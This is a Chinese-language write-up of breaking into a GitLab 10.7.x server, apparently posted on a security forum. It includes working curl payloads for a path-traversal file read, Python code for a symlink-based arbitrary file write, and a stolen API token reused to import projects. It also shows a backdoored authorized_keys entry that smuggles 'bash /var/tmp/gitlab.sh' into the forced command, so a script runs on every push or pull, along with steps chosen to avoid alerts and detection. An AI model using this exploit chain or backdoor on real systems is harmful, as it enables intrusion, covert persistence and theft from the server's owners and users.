端口扫描

nmap过了一遍,开了三个端口:

80的gitlab
22的SSH
8000的目录遍历

从8000端口的目录遍历获取到gitlab数据库的一个备份文件,很不幸的是这个备份文件是3年前的备份 :)

突破点

翻备份文件获取到的信息有如下:

  1. 登陆用户名
  2. 登陆密码的hash值
  3. 一堆提交的log

到这个时候是两个思路:

  1. 把gitlab的密码生成方式拿出来,然后弱密码跑一遍
  2. 再看看其他的

如果要达成第一条,需要过一下gitlab的密码生成流程,ruby不会,作为最后的方式再说。

authentication_token

在翻了N个gitlab的漏洞分析之后,在https://paper.seebug.org/104/文章里面找到authentication_token可以访问接口,尝试使用数据库里面的token测试成功。

Getshell

先确定gitlab的版本号:10.7.X
根据版本号在gitlab官方的issue里面翻到两处漏洞。
任意文件读取: https://gitlab.com/gitlab-org/gitlab-foss/issues/54857
任意文件写入: https://gitlab.com/gitlab-org/gitlab-foss/issues/49133

如果单是GetShell的话,用文件写入把ssh的公钥写到对应的目录,然后ssh登陆就可以了。
但是这样子就会造成两个问题:

  1. 对方用户使用git更新代码的时候就GG。
  2. 异地登陆SSH服务器会报警。

所以这个作为备用方案尝试。
gitlab的提交更新的时候,是先ssh认证,然后再执行gitlab命令,公钥的位置一般是固定的:/var/opt/gitlab/.ssh/authorized_keys,这个可以从gitlab的公钥可以很明显的看出来:

command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-133",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa ...

所以可以利用任意文件写入漏洞,把这个公钥全部改一遍,流程是这样的:

  1. 任意文件读取获取公钥的全部内容
  2. 把后门加上去,任意文件写入覆盖公钥,但是必须保证不能影响正常功能,这样用户提交代码之后就会触发后门。

公钥类似这样子:

command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-133 ;bash /var/tmp/gitlab.sh >/dev/null 2>&1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa ...

这里的gitlab.sh是用户push或者pull会触发执行,必须gitlab.sh脚本执行没有输出,不能阻塞。

  1. 输出会影响正常使用功能
  2. 反弹会阻塞正常功能使用

再回头说一下这两个漏洞,测试之前可以用docker本地测一下,docker文件如下:

web:
  image: 'gitlab/gitlab-ce:10.7.3-ce.0'
  restart: always
  hostname: '127.0.0.1'
  environment:
    GITLAB_OMNIBUS_CONFIG: |
      external_url 'http://gitlab.example.com'
      redis['bind']='127.0.0.1'
      redis['port']=6379
      gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')
      unicorn['socket']='/opt/gitlab/var/unicorn/gitlab.socket'
  ports:
    - '80:80'
    - '50443:443'
    - '22:22'
  volumes:
    - './srv/gitlab/config:/etc/gitlab'
    - './srv/gitlab/logs:/var/log/gitlab'
    - './srv/gitlab/data:/var/opt/gitlab'
    - './steg0_initial_root_password:/steg0_initial_root_password'

docker设置密码

docker启动之后,设置用户的密码:

gitlab-ctl reconfigure
gitlab-ctl restart

重置密码:
root 用户登录服务器,一定要是 root
gitlab-rails console production
user = User.where(id: 2).first
user.password = '123456aa'
user.password_confirmation = '123456aa'
user.save

\l  查看数据库
\dt  查看表
\di  看索引
\c <db> 连接某个db

Directory traversal with GitignoreTemplate API

检测这个漏洞很简单,POC:

127.0.0.1:5080/api/v4/templates/gitignores/%2e%2e%2fPython%2ea

然后我们拿Token来测试一下任意文件读取:

先建好数据包,然后打包

tar zcf vuln.tar.gz *

为了避免被发现,可以使用api接口来操作:

新建项目:
curl --request POST --header "PRIVATE-TOKEN: oijax6zWpkdZ9VZi419R" --form "path=project" --form "file=@./vuln.tar.gz" http://127.0.0.1:5080/api/v3/projects/import

导入项目(爆绝对路径):
curl  --header "PRIVATE-TOKEN: oijax6zWpkdZ9VZi419R"  http://127.0.0.1:5080/api/v4/projects/70/import

删除项目:
curl --request DELETE  --header "PRIVATE-TOKEN: oijax6zWpkdZ9VZi419R" http://127.0.0.1:5080/api/v4/projects/70


任意文件读取
PAYLOAD=$(echo "../../../public/uploads/../shared/tmp/project_exports/test1/33333/083c74ddd76bc4a1f7ef7635efddcebd/uploads/host" | sed 's|\.|%2e|g' | sed 's|\/|%2f|g')
curl  http://127.0.0.1/api/v3/templates/gitignores/$PAYLOAD%2ea -v|jq

注意事项:

  1. 如果使用tar zcf vuln.tar.gz ./* 会失败
  2. uploads目录权限555,防止gitlab删除符号链接
  3. project.json为空也是某的问题。
  4. 对于没有权限的文件,比如读取/root/.bash_history会出现500的message信息
  5. 可以读取多个,但是需要保证每个需要读取的文件有权限。
  6. 上传压缩包之后可以删除项目文件,软连接依旧存在
  7. 不存在的文件会显示404,二进制文件会显示500的message

任意文件覆盖漏洞

影响版本:>= 8.9.0
修复版本:11.0.4, 10.8.6, and 10.7.7

https://xz.aliyun.com/t/2661
https://gitlab.com/gitlab-org/gitlab-foss/issues/49133
https://gitlab.com/gitlab-org/gitlab-foss/issues/41757

建立一个文件名里面有换行符的软连接:

import os
os.symlink("/var/opt/gitlab", ".\nevil")

创建完了之后上传,成功导入项目之后Remove Project,此时在gitlab里面会保存这个软连接。然后构造第二个压缩包:

import os
os.makedirs(".\nevil")

创建一个包含换行符的目录,然后在改目录下创建要写入的文件夹以及文件

步骤:

  1. 创建完第一个文件夹之后,软连接到根目录
  2. 然后使用第二个压缩包把要写入的文件写到对应的目录里面即可,详细的内容可以看chybeta师傅的的复现步骤: https://xz.aliyun.com/t/2661

END:

gitlab备份文件,使用以下命令
sudo gitlab-rake gitlab:backup:create

点击收藏 | 4 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖